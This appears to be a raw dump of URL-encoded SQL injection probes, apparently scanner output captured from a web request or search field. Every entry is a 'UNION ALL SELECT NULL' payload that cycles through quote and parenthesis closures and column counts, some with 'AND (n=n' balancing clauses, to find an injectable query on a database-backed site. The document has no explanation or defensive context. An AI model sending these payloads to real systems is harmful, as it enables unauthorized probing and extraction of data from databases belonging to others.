1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%286425%3D6425 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%283283%3D3283 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%287741%3D7741 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%283090%3D3090 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%281665%3D1665 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%285569%3D5569 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%284258%3D4258 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%281771%3D1771 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%281525%3D1525 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%282841%3D2841 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%287996%3D7996 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%284022%3D4022 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%287079%3D7079 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%289345%3D9345 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%286456%3D6456 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%287607%3D7607 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%281597%3D1597 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%288737%3D8737 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%284083%3D4083 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%282442%3D2442 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%285133%3D5133 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%282944%3D2944 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%288676%3D8676 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%284794%3D4794 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%285167%3D5167 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%287048%3D7048 